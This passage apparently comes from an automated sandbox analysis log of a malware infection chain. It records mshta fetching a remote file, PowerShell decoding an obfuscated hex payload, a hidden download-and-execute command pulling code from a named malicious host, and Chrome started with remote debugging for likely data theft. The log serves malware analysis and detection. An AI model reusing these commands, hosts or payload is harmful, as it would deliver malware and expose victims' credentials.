                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
                    Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;e)
                    Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
                    Source: chrome.exe, 00000009.00000002.57296095824.0000781C03388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290233202.0000781C02ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297211801.0000781C03494000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
                    Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                    Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
                    Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';0\
                    Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';\'x
                    Source: chrome.exe, 00000009.00000002.57296095824.0000781C03388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286364303.0000781C02390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297211801.0000781C03494000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
                    Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
                    Source: chrome.exe, 00000009.00000002.57289202473.0000781C02998000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
                    Source: chrome.exe, 00000009.00000002.57289934914.0000781C02A74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
                    Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: imgutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
